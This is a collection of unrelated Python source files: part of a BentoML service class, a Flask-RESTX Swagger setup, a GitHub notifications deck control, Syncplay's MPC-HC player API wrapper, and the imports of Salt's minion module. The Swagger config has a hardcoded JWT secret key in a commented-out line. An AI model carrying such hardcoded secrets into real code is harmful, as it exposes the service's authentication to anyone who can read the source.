artifacts(ArtifactCollection): A dictionary of packed artifacts from the
artifact name to the BentoServiceArtifact instance
"""
return self._artifacts
@property
def env(self):
return self._env
@property
def web_static_content(self):
return self._web_static_content
def get_web_static_content_path(self):
if not self.web_static_content:
return None
if self._bento_service_bundle_path:
return os.path.join(
self._bento_service_bundle_path, self.name, 'web_static_content',
)
else:
return os.path.join(os.getcwd(), self.web_static_content)
@hybridmethod
@property
def name(self):
"""
:return: BentoService name
"""
return self.__class__.name() # pylint: disable=no-value-for-parameter
@name.classmethod
def name(cls): # pylint: disable=no-self-argument,invalid-overridden-method
"""
:return: BentoService name
"""
if cls._bento_service_name is not None:
if not cls._bento_service_name.isidentifier():
raise InvalidArgument(
                    'BentoService#_bento_service_name must be a valid python identifier '
                    'matching regex `(letter|"_")(letter|digit|"_")*`'
)
return cls._bento_service_name
else:
# Use python class name as service name
return cls.__name__
def set_version(self, version_str=None):
"""Set the version of this BentoService instance. Once the version is set
explicitly via `set_version`, the `self.versioneer` method will no longer be
invoked when saving this BentoService.
"""
if version_str is None:
version_str = self.versioneer()
if self._version_major is not None and self._version_minor is not None:
# BentoML uses semantic versioning for BentoService distribution
# when user specified the MAJOR and MINOR version number along with
# the BentoService class definition with '@ver' decorator.
# The parameter version(or auto generated version) here will be used as
# PATCH field in the final version:
version_str = ".".join(
[str(self._version_major), str(self._version_minor), version_str]
)
validate_version_str(version_str)
if self.__class__._bento_service_bundle_version is not None:
logger.warning(
"Overriding loaded BentoService(%s) version:%s to %s",
self.__class__._bento_service_bundle_path,
self.__class__._bento_service_bundle_version,
version_str,
)
self.__class__._bento_service_bundle_version = None
if (
self._bento_service_version is not None
and self._bento_service_version != version_str
):
logger.warning(
"Resetting BentoService '%s' version from %s to %s",
self.name,
self._bento_service_version,
version_str,
)
self._bento_service_version = version_str
return self._bento_service_version
def versioneer(self):
"""
Function used to generate a new version string when saving a new BentoService
bundle. User can also override this function to get a customized version format
"""
datetime_string = datetime.now().strftime("%Y%m%d%H%M%S")
random_hash = uuid.uuid4().hex[:6].upper()
# Example output: '20191009135240_D246ED'
return datetime_string + "_" + random_hash
@property
def version(self):
"""
Return the version of this BentoService. If the version of this BentoService has
not been set explicitly via `self.set_version`, a new version will be generated
with the `self.versioneer` method. User can customize this version str either by
setting the version with `self.set_version` before a `save` call, or override
the `self.versioneer` method to customize the version str generator logic.
For BentoService loaded from a saved bundle, this will simply return the version
information found in the saved bundle.
:return: BentoService version str
"""
if self.__class__._bento_service_bundle_version is not None:
return self.__class__._bento_service_bundle_version
if self._bento_service_version is None:
self.set_version(self.versioneer())
return self._bento_service_version
def save(self, yatai_url=None, version=None, labels=None):
"""
Save and register this BentoService via BentoML's built-in model management
system. BentoML by default keeps track of all the SavedBundle's files and
metadata in local file system under the $BENTOML_HOME(~/bentoml) directory.
Users can also configure BentoML to save their BentoService to a shared Database
and cloud object storage such as AWS S3.
:param yatai_url: optional - URL path to Yatai server
:param version: optional - save with version override
:param labels: optional - labels dictionary
:return: saved_path: file path to where the BentoService is saved
"""
from bentoml.yatai.client import get_yatai_client
yc = get_yatai_client(yatai_url)
return yc.repository.upload(self, version, labels)
def save_to_dir(self, path, version=None):
"""Save this BentoService along with all its artifacts, source code and
dependencies to target file path, assuming path exist and empty. If target path
is not empty, this call may override existing files in the given path.
:param path (str): Destination of where the bento service will be saved
:param version: optional - save with version override
"""
return save_to_dir(self, path, version)
@hybridmethod
def pack(self, name, *args, **kwargs):
"""
BentoService#pack method is used for packing trained model instances with a
BentoService instance and make it ready for BentoService#save.
pack(name, *args, **kwargs):
:param name: name of the declared model artifact
:param args: args passing to the target model artifact to be packed
:param kwargs: kwargs passing to the target model artifact to be packed
:return: this BentoService instance
"""
self.artifacts.get(name).pack(*args, **kwargs)
return self
@pack.classmethod
def pack(cls, *args, **kwargs): # pylint: disable=no-self-argument
"""
**Deprecated**: Legacy `BentoService#pack` class method, no longer supported
"""
raise BentoMLException(
"BentoService#pack class method is deprecated, use instance method `pack` "
"instead. e.g.: svc = MyBentoService(); svc.pack('model', model_object)"
)
def get_bento_service_metadata_pb(self):
return SavedBundleConfig(self).get_bento_service_metadata_pb()
pip_dependencies_map = None
def start_dev_server(
self, port=None, enable_microbatch=False, enable_ngrok=False, debug=False
):
if enable_microbatch:
raise NotImplementedError(
"start_dev_server with enable_microbatch=True is not implemented"
)
if self._dev_server_process:
logger.warning(
"There is already a running dev server, "
"please call `service.stop_dev_server()` first."
)
return
try:
self._dev_server_bundle_path = tempfile.TemporaryDirectory()
self.save_to_dir(self._dev_server_bundle_path.name)
def print_log(p):
for line in p.stdout:
print(line.decode(), end='')
def run(path, interrupt_event):
my_env = os.environ.copy()
# my_env["FLASK_ENV"] = "development"
cmd = [sys.executable, "-m", "bentoml", "serve"]
if port:
cmd += ['--port', f'{port}']
if enable_microbatch:
cmd += ['--enable-microbatch']
else:
cmd += ['--disable-microbatch']
if enable_ngrok:
cmd += ['--run-with-ngrok']
if debug:
cmd += ['--debug']
cmd += [path]
p = subprocess.Popen(
cmd,
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
env=my_env,
)
threading.Thread(target=print_log, args=(p,), daemon=True).start()
interrupt_event.wait()
p.terminate()
self._dev_server_interrupt_event = multiprocessing.Event()
self._dev_server_process = multiprocessing.Process(
target=run,
args=(
self._dev_server_bundle_path.name,
self._dev_server_interrupt_event,
),
daemon=True,
)
self._dev_server_process.start()
logger.info(
f"======= starting dev server on port: {port if port else 5000} ======="
)
except Exception as e: # pylint: disable=broad-except
self.stop_dev_server(skip_log=True)
raise e
def stop_dev_server(self, skip_log=False):
if self._dev_server_interrupt_event:
self._dev_server_interrupt_event.set()
self._dev_server_interrupt_event = None
if self._dev_server_process:
self._dev_server_process.join()
assert not self._dev_server_process.is_alive()
self._dev_server_process = None
logger.info("Dev server has stopped.")
elif not skip_log:
logger.warning("No dev server is running.")
if self._dev_server_bundle_path:
self._dev_server_bundle_path.cleanup()
self._dev_server_bundle_path = None
def __del__(self):
if hasattr(self, "_dev_server_interrupt_event"): # __init__ may not be called
self.stop_dev_server(skip_log=True)
@inject
def infer_pip_dependencies_map(
self,
bentoml_version: str = Provide[
BentoMLContainer.bento_bundle_deployment_version
],
):
if not self.pip_dependencies_map:
self.pip_dependencies_map = {}
bento_service_module = sys.modules[self.__class__.__module__]
if hasattr(bento_service_module, "__file__"):
bento_service_py_file_path = bento_service_module.__file__
reqs, unknown_modules = seek_pip_packages(bento_service_py_file_path)
self.pip_dependencies_map.update(reqs)
for module_name in unknown_modules:
logger.warning(
"unknown package dependency for module: %s", module_name
)
# Reset bentoml to configured deploy version - this is for users using
# customized BentoML branch for development but use a different stable
# version for deployment
#
# For example, a BentoService created with local dirty branch will fail
# to deploy with docker due to the version can't be found on PyPI, but
# get_bentoml_deploy_version gives the user the latest released PyPI
# version that's closest to the `dirty` branch
self.pip_dependencies_map['bentoml'] = bentoml_version
return self.pip_dependencies_map
|
swaggerConfig.py
|
from flask import Flask, g, request
from flask_restx import Api
import time, datetime, os, json, decimal
# from flask_jwt_extended import get_jwt_identity
import threading
# siteroot = os.path.realpath(os.path.dirname(__file__) + "/service/auth/")
# json_url = os.path.join(siteroot, "OAuth.json")
# OAuthJson = json.loads(open(json_url).read())
app = Flask(__name__)
# app.config["JWT_SECRET_KEY"] = "P+APugQ}&?cwwPXA]u+cEcfVnp8i]&"
# app.config["JWT_ACCESS_TOKEN_EXPIRES"] = False
# jwt = JWTManager(app)
# @app.before_request
# def before_request():
# g.start_time = time.time()
# g.response = {}
# def myconverter(o):
# if isinstance(o, datetime.datetime) or isinstance(o, datetime.date):
# return o.__str__()
# elif isinstance(o, decimal.Decimal):
# return float(o)
# @app.after_request
# def after_request(res):
# body = (
# (request.json if request.json is not None else dict(request.form))
# if request.method != "GET"
# else None
# )
# userid = None
# try:
# userid = get_jwt_identity()
# except Exception as e:
# pass
# newObject = [
# {
# "userid": userid,
# "path": request.path,
# "method": request.method,
# "browser": request.user_agent.browser,
# "browser_version": request.user_agent.version,
# "os": request.user_agent.platform,
# "ip_address": request.remote_addr,
# "params": dict(request.args),
# "body": body,
# "status": (g.response).get("status"),
# "duration": int((time.time() - g.start_time) * 1000),
# }
# ]
# threading.Thread(target=ServerLog, args=(newObject), daemon=True).start()
# try:
# if (res.get_data()).decode("utf-8") == "null\n":
# res.set_data(json.dumps(g.response, default=myconverter))
# return res
# except Exception as e:
# return res
# def ServerLog(logObject):
# StoreLog().log(logObject)
# app.config.SWAGGER_UI_OAUTH_CLIENT_ID = OAuthJson["google"]["clientId"]
# app.config.SWAGGER_UI_OAUTH_CLIENT_SECRET = OAuthJson["google"]["clientSecret"]
# app.config.SWAGGER_UI_OAUTH_REALM = "-"
# app.config.SWAGGER_UI_OAUTH_APP_NAME = "IndiaConnects"
# authorizations = {
# "api_key": {"type": "apiKey", "in": "header", "name": "AUTHORIZATION"}
# }
api = Api(
app,
version="1.0",
title="GMusic",
description="API DOCUMENTATION",
# security=["api_key"],
# authorizations=authorizations,
)
|
github_notifications_control.py
|
import os
import threading
from subprocess import Popen, DEVNULL
from time import sleep
from typing import Any, Dict, List
import requests as requests
from devdeck_core.controls.deck_control import DeckControl
class GithubNotificationsControl(DeckControl):
def __init__(self, key_no: int, **kwargs) -> None:
super().__init__(key_no, **kwargs)
self.thread = None
self.running = False
self.last_url = None
def initialize(self) -> None:
self.thread = threading.Thread(target=self._update_loop)
self.running = True
self.thread.start()
def pressed(self) -> None:
if self.last_url is None:
self._update_display()
return
browser = self.settings.get('browser') or 'firefox'
Popen([browser, self.last_url], stdout=DEVNULL, stderr=DEVNULL)
# Wait 5 seconds for the browser to load the page before refreshing the display.
sleep(5)
self._update_display()
    def get_notifications(self) -> List[Dict[str, Any]]:
assert self.settings['token'], 'Please specify your Github API token in `settings.yml`'
headers = {
'Authorization': f"token {self.settings['token']}",
'User-Agent': 'devdeck',
}
return requests.get('https://api.github.com/notifications', headers=headers).json()
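    # The notifications endpoint returns a JSON list; _update_display() below relies on
    # each entry exposing ['subject']['url'], and an empty list is treated as "no alerts".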
def _update_display(self) -> None:
notifications = self.get_notifications()
count = len(notifications)
alert_color = self.settings.get('color') or '#ff2b2b'
color = alert_color if count > 0 else '#ffffff'
self.last_url = notifications[0]['subject']['url'] \
.replace('api.', '').replace('repos/', '').replace('pulls/', 'pull/') \
if count > 0 else None
with self.deck_context() as context:
with context.renderer() as r:
r.image(os.path.join(os.path.dirname(__file__), "../assets/font-awesome", 'github.png')) \
.width(240) \
.height(240) \
.center_horizontally() \
.y(225) \
.end()
r.text(str(count)) \
.center_horizontally() \
.center_vertically(-175) \
.font_size(150) \
.color(color) \
.end()
def _update_loop(self) -> None:
while self.running is True:
self._update_display()
sleep(self.settings.get('refresh_seconds') or 60)
def dispose(self) -> None:
self.running = False
if self.thread:
self.thread.join()
|
mpc.py
|
import os.path
import re
import time
import threading
import _thread
from functools import wraps
import win32con, win32api, win32gui, ctypes, ctypes.wintypes #@UnresolvedImport @UnusedImport
from syncplay import constants
from syncplay.messages import getMessage
from syncplay.players.basePlayer import BasePlayer
from syncplay.utils import retry
class MpcHcApi:
def __init__(self):
self.callbacks = self.__Callbacks()
self.loadState = None
self.playState = None
self.filePlaying = None
self.fileDuration = None
self.filePath = None
self.lastFilePosition = None
self.version = None
self.__playpause_warden = False
self.__locks = self.__Locks()
self.__mpcExistenceChecking = threading.Thread(target=self.__mpcReadyInSlaveMode, name="Check MPC window")
self.__mpcExistenceChecking.setDaemon(True)
self.__listener = self.__Listener(self, self.__locks)
self.__listener.setDaemon(True)
self.__listener.start()
self.__locks.listenerStart.wait()
def waitForFileStateReady(f): #@NoSelf
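        # Method decorator: the wrapped call blocks until MPC signals that a file is
        # loaded (fileReady event) or raises PlayerNotReadyException if the wait exceeds
        # MPC_LOCK_WAIT_TIME.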
@wraps(f)
def wrapper(self, *args, **kwds):
if not self.__locks.fileReady.wait(constants.MPC_LOCK_WAIT_TIME):
raise self.PlayerNotReadyException()
return f(self, *args, **kwds)
return wrapper
def startMpc(self, path, args=()):
args = "%s /slave %s" % (" ".join(args), str(self.__listener.hwnd))
win32api.ShellExecute(0, "open", path, args, None, 1)
if not self.__locks.mpcStart.wait(constants.MPC_OPEN_MAX_WAIT_TIME):
raise self.NoSlaveDetectedException(getMessage("mpc-slave-error"))
self.__mpcExistenceChecking.start()
def openFile(self, filePath):
self.__listener.SendCommand(self.CMD_OPENFILE, filePath)
def isPaused(self):
return self.playState != self.__MPC_PLAYSTATE.PS_PLAY and self.playState is not None
def askForVersion(self):
self.__listener.SendCommand(self.CMD_GETVERSION)
@waitForFileStateReady
def pause(self):
self.__listener.SendCommand(self.CMD_PAUSE)
@waitForFileStateReady
def playPause(self):
self.__listener.SendCommand(self.CMD_PLAYPAUSE)
@waitForFileStateReady
def unpause(self):
self.__listener.SendCommand(self.CMD_PLAY)
@waitForFileStateReady
def askForCurrentPosition(self):
self.__listener.SendCommand(self.CMD_GETCURRENTPOSITION)
@waitForFileStateReady
def seek(self, position):
self.__listener.SendCommand(self.CMD_SETPOSITION, str(position))
@waitForFileStateReady
def setSpeed(self, rate):
self.__listener.SendCommand(self.CMD_SETSPEED, str(rate))
def sendOsd(self, message, MsgPos=constants.MPC_OSD_POSITION, DurationMs=(constants.OSD_DURATION*1000)):
class __OSDDATASTRUCT(ctypes.Structure):
_fields_ = [
('nMsgPos', ctypes.c_int32),
('nDurationMS', ctypes.c_int32),
('strMsg', ctypes.c_wchar * (len(message) + 1))
]
cmessage = __OSDDATASTRUCT()
cmessage.nMsgPos = MsgPos
cmessage.nDurationMS = DurationMs
cmessage.strMsg = message
self.__listener.SendCommand(self.CMD_OSDSHOWMESSAGE, cmessage)
def sendRawCommand(self, cmd, value):
self.__listener.SendCommand(cmd, value)
def handleCommand(self, cmd, value):
if cmd == self.CMD_CONNECT:
self.__listener.mpcHandle = int(value)
self.__locks.mpcStart.set()
if self.callbacks.onConnected:
_thread.start_new_thread(self.callbacks.onConnected, ())
elif cmd == self.CMD_STATE:
self.loadState = int(value)
fileNotReady = (
self.loadState == self.__MPC_LOADSTATE.MLS_CLOSING or
self.loadState == self.__MPC_LOADSTATE.MLS_LOADING or
self.loadState == self.__MPC_LOADSTATE.MLS_CLOSED
)
if fileNotReady:
self.playState = None
self.__locks.fileReady.clear()
else:
self.__locks.fileReady.set()
if self.callbacks.onFileStateChange:
_thread.start_new_thread(self.callbacks.onFileStateChange, (self.loadState,))
elif cmd == self.CMD_PLAYMODE:
self.playState = int(value)
if self.callbacks.onUpdatePlaystate:
_thread.start_new_thread(self.callbacks.onUpdatePlaystate, (self.playState,))
elif cmd == self.CMD_NOWPLAYING:
value = re.split(r'(?<!\\)\|', value)
if self.filePath == value[3]:
return
self.filePath = value[3]
self.filePlaying = value[3].split('\\').pop()
self.fileDuration = float(value[4])
if self.callbacks.onUpdatePath:
                _thread.start_new_thread(self.callbacks.onUpdatePath, (self.filePath,))
if self.callbacks.onUpdateFilename:
_thread.start_new_thread(self.callbacks.onUpdateFilename, (self.filePlaying,))
if self.callbacks.onUpdateFileDuration:
_thread.start_new_thread(self.callbacks.onUpdateFileDuration, (self.fileDuration,))
elif cmd == self.CMD_CURRENTPOSITION:
self.lastFilePosition = float(value)
if self.callbacks.onGetCurrentPosition:
_thread.start_new_thread(self.callbacks.onGetCurrentPosition, (self.lastFilePosition,))
elif cmd == self.CMD_NOTIFYSEEK:
if self.lastFilePosition != float(value): # Notify seek is sometimes sent twice
self.lastFilePosition = float(value)
if self.callbacks.onSeek:
_thread.start_new_thread(self.callbacks.onSeek, (self.lastFilePosition,))
elif cmd == self.CMD_DISCONNECT:
if self.callbacks.onMpcClosed:
_thread.start_new_thread(self.callbacks.onMpcClosed, (None,))
elif cmd == self.CMD_VERSION:
if self.callbacks.onVersion:
self.version = value
_thread.start_new_thread(self.callbacks.onVersion, (value,))
class PlayerNotReadyException(Exception):
pass
class __Callbacks:
def __init__(self):
self.onConnected = None
self.onSeek = None
self.onUpdatePath = None
self.onUpdateFilename = None
self.onUpdateFileDuration = None
self.onGetCurrentPosition = None
self.onUpdatePlaystate = None
self.onFileStateChange = None
self.onMpcClosed = None
self.onVersion = None
class __Locks:
def __init__(self):
self.listenerStart = threading.Event()
self.mpcStart = threading.Event()
self.fileReady = threading.Event()
def __mpcReadyInSlaveMode(self):
while True:
time.sleep(10)
if not win32gui.IsWindow(self.__listener.mpcHandle):
if self.callbacks.onMpcClosed:
self.callbacks.onMpcClosed(None)
break
CMD_CONNECT = 0x50000000
CMD_STATE = 0x50000001
CMD_PLAYMODE = 0x50000002
CMD_NOWPLAYING = 0x50000003
CMD_LISTSUBTITLETRACKS = 0x50000004
CMD_LISTAUDIOTRACKS = 0x50000005
CMD_CURRENTPOSITION = 0x50000007
CMD_NOTIFYSEEK = 0x50000008
CMD_NOTIFYENDOFSTREAM = 0x50000009
CMD_PLAYLIST = 0x50000006
CMD_OPENFILE = 0xA0000000
CMD_STOP = 0xA0000001
CMD_CLOSEFILE = 0xA0000002
CMD_PLAYPAUSE = 0xA0000003
CMD_ADDTOPLAYLIST = 0xA0001000
CMD_CLEARPLAYLIST = 0xA0001001
CMD_STARTPLAYLIST = 0xA0001002
CMD_REMOVEFROMPLAYLIST = 0xA0001003 # TODO
CMD_SETPOSITION = 0xA0002000
CMD_SETAUDIODELAY = 0xA0002001
CMD_SETSUBTITLEDELAY = 0xA0002002
CMD_SETINDEXPLAYLIST = 0xA0002003 # DOESNT WORK
CMD_SETAUDIOTRACK = 0xA0002004
CMD_SETSUBTITLETRACK = 0xA0002005
CMD_GETSUBTITLETRACKS = 0xA0003000
CMD_GETCURRENTPOSITION = 0xA0003004
CMD_JUMPOFNSECONDS = 0xA0003005
CMD_GETAUDIOTRACKS = 0xA0003001
CMD_GETNOWPLAYING = 0xA0003002
CMD_GETPLAYLIST = 0xA0003003
CMD_TOGGLEFULLSCREEN = 0xA0004000
CMD_JUMPFORWARDMED = 0xA0004001
CMD_JUMPBACKWARDMED = 0xA0004002
CMD_INCREASEVOLUME = 0xA0004003
CMD_DECREASEVOLUME = 0xA0004004
CMD_SHADER_TOGGLE = 0xA0004005
CMD_CLOSEAPP = 0xA0004006
CMD_OSDSHOWMESSAGE = 0xA0005000
CMD_VERSION = 0x5000000A
CMD_DISCONNECT = 0x5000000B
CMD_PLAY = 0xA0000004
CMD_PAUSE = 0xA0000005
CMD_GETVERSION = 0xA0003006
CMD_SETSPEED = 0xA0004008
class __MPC_LOADSTATE:
MLS_CLOSED = 0
MLS_LOADING = 1
MLS_LOADED = 2
MLS_CLOSING = 3
class __MPC_PLAYSTATE:
PS_PLAY = 0
PS_PAUSE = 1
PS_STOP = 2
PS_UNUSED = 3
class __Listener(threading.Thread):
def __init__(self, mpcApi, locks):
self.__mpcApi = mpcApi
self.locks = locks
self.mpcHandle = None
self.hwnd = None
self.__PCOPYDATASTRUCT = ctypes.POINTER(self.__COPYDATASTRUCT)
threading.Thread.__init__(self, name="MPC Listener")
def run(self):
message_map = {
win32con.WM_COPYDATA: self.OnCopyData
}
wc = win32gui.WNDCLASS()
wc.lpfnWndProc = message_map
wc.lpszClassName = 'MPCApiListener'
hinst = wc.hInstance = win32api.GetModuleHandle(None)
classAtom = win32gui.RegisterClass(wc)
self.hwnd = win32gui.CreateWindow(
classAtom,
"ListenerGUI",
0,
0,
0,
win32con.CW_USEDEFAULT,
win32con.CW_USEDEFAULT,
0,
0,
hinst,
None
)
self.locks.listenerStart.set()
win32gui.PumpMessages()
def OnCopyData(self, hwnd, msg, wparam, lparam):
pCDS = ctypes.cast(lparam, self.__PCOPYDATASTRUCT)
# print "API:\tin>\t 0x%X\t" % int(pCDS.contents.dwData), ctypes.wstring_at(pCDS.contents.lpData)
self.__mpcApi.handleCommand(pCDS.contents.dwData, ctypes.wstring_at(pCDS.contents.lpData))
def SendCommand(self, cmd, message=''):
# print "API:\t<out\t 0x%X\t" % int(cmd), message
if not win32gui.IsWindow(self.mpcHandle):
if self.__mpcApi.callbacks.onMpcClosed:
self.__mpcApi.callbacks.onMpcClosed(None)
cs = self.__COPYDATASTRUCT()
            cs.dwData = cmd
if isinstance(message, str):
message = ctypes.create_unicode_buffer(message, len(message) + 1)
elif isinstance(message, ctypes.Structure):
pass
else:
raise TypeError
cs.lpData = ctypes.addressof(message)
cs.cbData = ctypes.sizeof(message)
ptr = ctypes.addressof(cs)
win32api.SendMessage(self.mpcHandle, win32con.WM_COPYDATA, self.hwnd, ptr)
class __COPYDATASTRUCT(ctypes.Structure):
_fields_ = [
('dwData', ctypes.wintypes.LPARAM),
('cbData', ctypes.wintypes.DWORD),
('lpData', ctypes.c_void_p)
]
class MPCHCAPIPlayer(BasePlayer):
speedSupported = False
alertOSDSupported = False
customOpenDialog = False
chatOSDSupported = False
osdMessageSeparator = "; "
def __init__(self, client):
from twisted.internet import reactor
self.reactor = reactor
self.__client = client
self._mpcApi = MpcHcApi()
self._mpcApi.callbacks.onUpdateFilename = lambda _: self.__makePing()
self._mpcApi.callbacks.onMpcClosed = lambda _: self.reactor.callFromThread(self.__client.stop, False,)
self._mpcApi.callbacks.onFileStateChange = lambda _: self.__lockAsking()
self._mpcApi.callbacks.onUpdatePlaystate = lambda _: self.__unlockAsking()
self._mpcApi.callbacks.onGetCurrentPosition = lambda _: self.__onGetPosition()
self._mpcApi.callbacks.onVersion = lambda _: self.__versionUpdate.set()
self.__switchPauseCalls = False
self.__preventAsking = threading.Event()
self.__positionUpdate = threading.Event()
self.__versionUpdate = threading.Event()
self.__fileUpdate = threading.RLock()
self.__versionUpdate.clear()
@staticmethod
def getMinVersionErrorMessage():
return getMessage("mpc-version-insufficient-error").format(constants.MPC_MIN_VER)
def drop(self):
self.__preventAsking.set()
self.__positionUpdate.set()
self.__versionUpdate.set()
self._mpcApi.sendRawCommand(MpcHcApi.CMD_CLOSEAPP, "")
@staticmethod
def getPlayerPathErrors(playerPath, filePath):
return None
@staticmethod
def run(client, playerPath, filePath, args):
args.extend(['/open', '/new'])
mpc = MPCHCAPIPlayer(client)
mpc._mpcApi.callbacks.onConnected = lambda: mpc.initPlayer(filePath if filePath else None)
mpc._mpcApi.startMpc(MPCHCAPIPlayer.getExpandedPath(playerPath), args)
client.initPlayer(mpc)
return mpc
def __lockAsking(self):
self.__preventAsking.clear()
def __unlockAsking(self):
self.__preventAsking.set()
def __onGetPosition(self):
self.__positionUpdate.set()
def setSpeed(self, value):
try:
self._mpcApi.setSpeed(value)
except MpcHcApi.PlayerNotReadyException:
self.setSpeed(value)
def __dropIfNotSufficientVersion(self):
self._mpcApi.askForVersion()
if not self.__versionUpdate.wait(0.1) or not self._mpcApi.version:
self.reactor.callFromThread(self.__client.ui.showErrorMessage, self.getMinVersionErrorMessage(), True)
self.reactor.callFromThread(self.__client.stop, True)
def __testMpcReady(self):
if not self.__preventAsking.wait(10):
raise Exception(getMessage("player-file-open-error"))
def __makePing(self):
try:
self.__testMpcReady()
self._mpcApi.callbacks.onUpdateFilename = lambda _: self.__handleUpdatedFilename()
self.__handleUpdatedFilename()
self.askForStatus()
except Exception as err:
self.reactor.callFromThread(self.__client.ui.showErrorMessage, err.message, True)
self.reactor.callFromThread(self.__client.stop)
def initPlayer(self, filePath):
self.__dropIfNotSufficientVersion()
if not self._mpcApi.version:
return
self.__mpcVersion = self._mpcApi.version.split('.')
if self.__mpcVersion[0:3] == ['1', '6', '4']:
self.__switchPauseCalls = True
if filePath:
self.openFile(filePath)
def openFile(self, filePath, resetPosition=False):
self._mpcApi.openFile(filePath)
if resetPosition:
self.setPosition(0)
def displayMessage(
self, message,
duration=(constants.OSD_DURATION*1000), OSDType=constants.OSD_NOTIFICATION, mood=constants.MESSAGE_NEUTRAL
):
self._mpcApi.sendOsd(message, constants.MPC_OSD_POSITION, duration)
@retry(MpcHcApi.PlayerNotReadyException, constants.MPC_MAX_RETRIES, constants.MPC_RETRY_WAIT_TIME, 1)
def setPaused(self, value):
if self._mpcApi.filePlaying:
if self.__switchPauseCalls:
value = not value
if value:
self._mpcApi.pause()
else:
self._mpcApi.unpause()
def setFeatures(self, featureList):
pass
@retry(MpcHcApi.PlayerNotReadyException, constants.MPC_MAX_RETRIES, constants.MPC_RETRY_WAIT_TIME, 1)
def setPosition(self, value):
if self._mpcApi.filePlaying:
self._mpcApi.seek(value)
def __getPosition(self):
self.__positionUpdate.clear()
self._mpcApi.askForCurrentPosition()
self.__positionUpdate.wait(constants.MPC_LOCK_WAIT_TIME)
return self._mpcApi.lastFilePosition
def askForStatus(self):
try:
if self._mpcApi.filePlaying and self.__preventAsking.wait(0) and self.__fileUpdate.acquire(0):
self.__fileUpdate.release()
position = self.__getPosition()
paused = self._mpcApi.isPaused()
position = float(position)
if self.__preventAsking.wait(0) and self.__fileUpdate.acquire(0):
self.__client.updatePlayerStatus(paused, position)
self.__fileUpdate.release()
else:
self.__echoGlobalStatus()
except MpcHcApi.PlayerNotReadyException:
self.__echoGlobalStatus()
def __echoGlobalStatus(self):
self.__client.updatePlayerStatus(self.__client.getGlobalPaused(), self.__client.getGlobalPosition())
def __forcePause(self):
for _ in range(constants.MPC_MAX_RETRIES):
self.setPaused(True)
time.sleep(constants.MPC_RETRY_WAIT_TIME)
def __refreshMpcPlayState(self):
for _ in range(2):
self._mpcApi.playPause()
time.sleep(constants.MPC_PAUSE_TOGGLE_DELAY)
def _setPausedAccordinglyToServer(self):
self.__forcePause()
self.setPaused(self.__client.getGlobalPaused())
if self._mpcApi.isPaused() != self.__client.getGlobalPaused():
self.__refreshMpcPlayState()
if self._mpcApi.isPaused() != self.__client.getGlobalPaused():
self.__setUpStateForNewlyOpenedFile()
@retry(MpcHcApi.PlayerNotReadyException, constants.MPC_MAX_RETRIES, constants.MPC_RETRY_WAIT_TIME, 1)
def __setUpStateForNewlyOpenedFile(self):
self._setPausedAccordinglyToServer()
self._mpcApi.seek(self.__client.getGlobalPosition())
def __handleUpdatedFilename(self):
with self.__fileUpdate:
self.__setUpStateForNewlyOpenedFile()
args = (self._mpcApi.filePlaying, self._mpcApi.fileDuration, self._mpcApi.filePath)
self.reactor.callFromThread(self.__client.updateFile, *args)
def sendCustomCommand(self, cmd, val):
self._mpcApi.sendRawCommand(cmd, val)
@staticmethod
def getDefaultPlayerPathsList():
return constants.MPC_PATHS
@staticmethod
def getIconPath(path):
if (
MPCHCAPIPlayer.getExpandedPath(path).lower().endswith('mpc-hc64.exe'.lower()) or
MPCHCAPIPlayer.getExpandedPath(path).lower().endswith('mpc-hc64_nvo.exe'.lower())
):
return constants.MPC64_ICONPATH
else:
return constants.MPC_ICONPATH
@staticmethod
def isValidPlayerPath(path):
if MPCHCAPIPlayer.getExpandedPath(path):
return True
return False
@staticmethod
def getExpandedPath(path):
        knownExes = ['mpc-hc.exe', 'mpc-hcportable.exe', 'mpc-hc_nvo.exe', 'mpc-hc64.exe', 'mpc-hc64_nvo.exe']
        if os.path.isfile(path):
            if any(path.lower().endswith(exe) for exe in knownExes):
                return path
        # Otherwise treat the given path as a directory prefix and try each known
        # executable name, first without and then with a path separator, in the
        # same order as before
        for exe in knownExes:
            if os.path.isfile(path + exe):
                return path + exe
            if os.path.isfile(path + "\\" + exe):
                return path + "\\" + exe
minion.py
# -*- coding: utf-8 -*-
'''
Routines to set up a minion
'''
# Import python libs
from __future__ import absolute_import, print_function, with_statement
import os
import re
import sys
import copy
import time
import types
import signal
import fnmatch
import logging
import threading
import traceback
import contextlib
import multiprocessing
from random import randint, shuffle
from stat import S_IMODE
# Import Salt Libs
# pylint: disable=import-error,no-name-in-module,redefined-builtin
import salt.ext.six as six
if six.PY3:
import ipaddress
else:
import salt.ext.ipaddress as ipaddress
from salt.ext.six.moves import range
# pylint: enable=no-name-in-module,redefined-builtin
# Import third party libs
try:
import zmq
# TODO: cleanup
import zmq.eventloop.ioloop
# support pyzmq 13.0.x, TODO: remove once we force people to 14.0.x
if not hasattr(zmq.eventloop.ioloop, 'ZMQIOLoop'):
zmq.eventloop.ioloop.ZMQIOLoop = zmq.eventloop.ioloop.IOLoop
LOOP_CLASS = zmq.eventloop.ioloop.ZMQIOLoop
HAS_ZMQ = True
except ImportError:
import tornado.ioloop
LOOP_CLASS = tornado.ioloop.IOLoop
HAS_ZMQ = False
HAS_RANGE = False
try:
import seco.range
HAS_RANGE = True
except ImportError:
pass
HAS_PSUTIL = False
try:
import salt.utils.psutil_compat as psutil
HAS_PSUTIL = True
except ImportError:
pass
HAS_RESOURCE = False
try:
import resource
HAS_RESOURCE = True
except ImportError:
pass
try:
import zmq.utils.monitor
HAS_ZMQ_MONITOR = True
except ImportError:
HAS_ZMQ_MONITOR = False
# pylint: enable=import-error
# Import salt libs
import salt
import salt.client
import salt.crypt
import salt.loader
import salt.beacons
import salt.engines
import salt.payload
import salt.syspaths
import salt.utils
import salt.utils.context
import salt.utils.jid
import salt.pillar
import salt.utils.args
import salt.utils.event
import salt.utils.minion
import salt.utils.minions
import salt.utils.schedule
import salt.utils.error
import salt.utils.zeromq
import salt.defaults.exitcodes
import salt.cli.daemons
import salt.log.setup
from salt.config import DEFAULT_MINION_OPTS
from salt.defaults import DEFAULT_TARGET_DELIM
from salt.executors import FUNCTION_EXECUTORS
from salt.utils.debug import enable_sigusr1_handler
from salt.utils.event import tagify
from salt.utils.odict import OrderedDict
from salt.utils.process import (default_signals,
SignalHandlingMultiprocessingProcess,
ProcessManager)
from salt.exceptions import (
CommandExecutionError,
CommandNotFoundError,
SaltInvocationError,
SaltReqTimeoutError,
SaltClientError,
SaltSystemExit,
SaltDaemonNotRunning,
SaltException,
)
import tornado.gen # pylint: disable=F0401
import tornado.ioloop # pylint: disable=F0401
